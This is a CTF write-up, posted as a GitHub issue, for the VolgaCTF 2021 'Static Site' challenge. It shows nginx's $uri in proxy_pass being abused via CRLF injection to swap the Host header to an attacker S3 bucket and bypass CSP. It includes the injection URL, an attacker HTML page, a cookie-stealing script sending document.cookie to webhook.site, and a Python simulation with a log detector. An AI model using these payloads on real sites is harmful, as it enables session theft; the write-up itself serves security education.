
VolgaCTF 2021 Qualifier - Static Site #28

Open
aszx87410 opened this issue Mar 28, 2021 · 0 comments
aszx87410 commented Mar 28, 2021

Static Site

Description

[Screenshot: challenge description, 2021-03-28 11:12:54 PM]

nginx config

server {
    listen 443 ssl;
    resolver 8.8.8.8;
    server_name static-site.volgactf-task.ru;

    ssl_certificate      /etc/letsencrypt/live/volgactf-task.ru/fullchain1.pem;
    ssl_certificate_key  /etc/letsencrypt/live/volgactf-task.ru/privkey1.pem;

    add_header Content-Security-Policy "default-src 'self'; object-src 'none'; frame-src https://www.google.com/recaptcha/; font-src https://fonts.gstatic.com/; style-src 'self' https://fonts.googleapis.com/; script-src 'self' https://www.google.com/recaptcha/api.js https://www.gstatic.com/recaptcha/" always;
   
    location / {
      root /var/www/html;
    }

    location /static/ {
      proxy_pass https://volga-static-site.s3.amazonaws.com$uri;
    }
}

index.html

<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <title>Static Site</title>
    <link rel="stylesheet" href="./static/bootstrap.min.css">
  </head>

  <body class="text-center">
    <div class="cover-container d-flex h-100 p-3 mx-auto flex-column">
      <header class="mt-5">
          <h3 class="masthead-brand">Static Site</h3>
      </header>

      <main role="main" class="mt-5">
        <p class="lead"><img src="./static/hacker.gif"/></p>
        <p class="lead pt-5">
          Ok, hackers, I created a static site with a strict Content-Security-Policy.
        </p>
        <p class="lead">
          It is simply impossible to steal my cookies now!
        </p>
        <p class="lead">
          But, you can still try:
        </p>
        <p>
          <form id="form" class="form-inline justify-content-center" method="POST" action="https://bot-static-site.volgactf-task.ru/">
            <div class="form-group">
              <label for="url">URL</label>
              <input type="url" name="url" id="url" class="form-control mx-sm-3">
              <input type="submit" class="btn btn-secondary g-recaptcha" data-sitekey="6LdN230aAAAAAPsMXHWZ9szidC6tbkSzWDarMqmL" data-callback="onSubmit" data-action="submit">
            </div>
          </form>
        </p>
      </main>
    </div>
    <script src="https://www.google.com/recaptcha/api.js"></script>
    <script src="./static/captcha.js"></script>
  </body>
</html>

Writeup

After reviewing the nginx config and the HTML file, this part caught my eye:

location /static/ {
   proxy_pass https://volga-static-site.s3.amazonaws.com$uri;
}

Then I googled "nginx $uri vulnerability" and found some useful resources:

  1. Bottle HTTP 头注入漏洞探究 (A study of the Bottle HTTP header injection vulnerability)
  2. 新浪某站CRLF Injection导致的安全问题 (Security issues caused by CRLF injection on a Sina site)
  3. Some cases of insecure NGINX configurations

We can use CRLF injection to change the request. I am not familiar with nginx, so I set up an environment locally to see how I could use it. After playing around for a while, I found that I could fake the Host header to read files from my own bucket:

https://static-site.volgactf-task.ru/static/app.js%20HTTP/1.0%0d%0aHost:%20ctftesthuli.s3.amazonaws.com%0d%0ayo:
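The mechanism behind that URL, as an added example that is not part of the original writeup: nginx's `$uri` variable holds the percent-decoded, normalised path, so when it is spliced into `proxy_pass https://host$uri;` the `%0d%0a` bytes reach the upstream as real CR/LF and are parsed as extra headers. The simulation below builds the upstream request both ways (decoded `$uri` versus a re-escaped path, which is what `$request_uri` or a variable-free `proxy_pass` gives you), parses it as a simple upstream would, and also runs a detection check over constructed access-log lines in nginx's combined format. The bucket name `attacker-bucket.s3.amazonaws.com`, the client IPs and the log lines are constructed; the upstream host is the one from the nginx config on the page.

```python
"""Model of nginx $uri decoding inside proxy_pass, plus an access-log check.
Added example (not the writeup's code); hostnames and log lines are constructed."""
import re
from urllib.parse import quote, unquote

# Upstream host from the challenge's nginx config.
UPSTREAM_HOST = "volga-static-site.s3.amazonaws.com"

# Constructed request path of the same shape as the one in the writeup,
# with a placeholder bucket name instead of the author's bucket.
ATTACK_PATH = (
    "/static/app.js%20HTTP/1.0%0d%0aHost:%20attacker-bucket.s3.amazonaws.com%0d%0ayo:"
)


def build_upstream_request(raw_path: str, use_decoded_uri: bool) -> str:
    """Return the request nginx would send upstream for `GET raw_path`.

    use_decoded_uri=True mimics `proxy_pass https://host$uri;`: $uri is the
    normalised (percent-decoded) path, so %0d%0a become raw CR/LF bytes.
    use_decoded_uri=False mimics a proxy_pass that re-escapes the path
    ($request_uri, or a variable-free proxy_pass), keeping them encoded.
    """
    if use_decoded_uri:
        path = unquote(raw_path)
    else:
        # Normalise, then re-escape before building the request line.
        path = quote(unquote(raw_path), safe="/")
    return (
        f"GET {path} HTTP/1.0\r\n"
        f"Host: {UPSTREAM_HOST}\r\n"
        "Connection: close\r\n\r\n"
    )


def parse_request_headers(request: str) -> dict:
    """Parse a request head the way a simple upstream would.

    The first line is the request line; each following line up to the blank
    line is a 'Name: value' header. When a header repeats, the first value is
    kept, which matches what the writeup observed (the injected Host won).
    """
    head = request.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers.setdefault(name.strip().lower(), value.strip())
    return {"request_line": lines[0], "headers": headers}


# Encoded CR/LF, raw CR/LF, or nginx's \xNN escaping of them inside $request.
CRLF_IN_TARGET = re.compile(r"%0[dDaA]|\\x0[dDaA]|[\r\n]")
REQUEST_LINE = re.compile(r'"[A-Z]+ (\S+) HTTP/\d\.\d"')

# Constructed access-log lines in nginx's default combined format.
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [28/Mar/2021:23:12:54 +0000] "GET /static/bootstrap.min.css HTTP/1.1" 200 155758 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [28/Mar/2021:23:13:01 +0000] "GET ' + ATTACK_PATH + ' HTTP/1.1" 200 51 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [28/Mar/2021:23:13:09 +0000] "GET /static/hacker.gif HTTP/1.1" 200 9001 "-" "curl/7.68.0"',
]


def find_crlf_attempts(access_log_lines) -> list:
    """Return the request targets whose path carries an encoded or raw CR/LF.

    Browsers send the path percent-encoded, so $request in the log still
    shows %0d%0a even though $uri was decoded before reaching the upstream.
    """
    hits = []
    for line in access_log_lines:
        m = REQUEST_LINE.search(line)
        if m and CRLF_IN_TARGET.search(m.group(1)):
            hits.append(m.group(1))
    return hits


if __name__ == "__main__":
    for decoded in (True, False):
        parsed = parse_request_headers(build_upstream_request(ATTACK_PATH, decoded))
        print("decoded $uri" if decoded else "re-escaped path", "->", parsed)
    print("suspicious targets:", find_crlf_attempts(SAMPLE_ACCESS_LOG))
```

With the decoded path the upstream sees `Host: attacker-bucket.s3.amazonaws.com` and a stray `yo:` header, exactly the effect the writeup exploits; with the re-escaped path the whole payload stays inside the request target and the Host header is the configured bucket. The configuration-side fix follows from this: avoid `$uri` in `proxy_pass` and let nginx re-escape the path (for example `proxy_pass https://volga-static-site.s3.amazonaws.com/static/;` under `location /static/`), and alert on the `%0d%0a` pattern in access logs, which the log check above flags on the second constructed line only.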

So the solution is straightforward:

  1. create my own S3 bucket
  2. upload /static/index.html
  3. upload /static/app.js
  4. let the bot visit https://static-site.volgactf-task.ru/static/index.html%20HTTP/1.0%0d%0aHost:%20ctftesthuli.s3.amazonaws.com%0d%0ayo:
  5. XSS triggered!

html file

<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  </head>

  <body class="text-center">
    
    hello
    <script src="/static/app.js%20HTTP/1.0%0d%0aHost:%20ctftesthuli.s3.amazonaws.com%0d%0ayo:"></script>
  </body>
</html>

js file

window.location = 'https://webhook.site?c='+document.cookie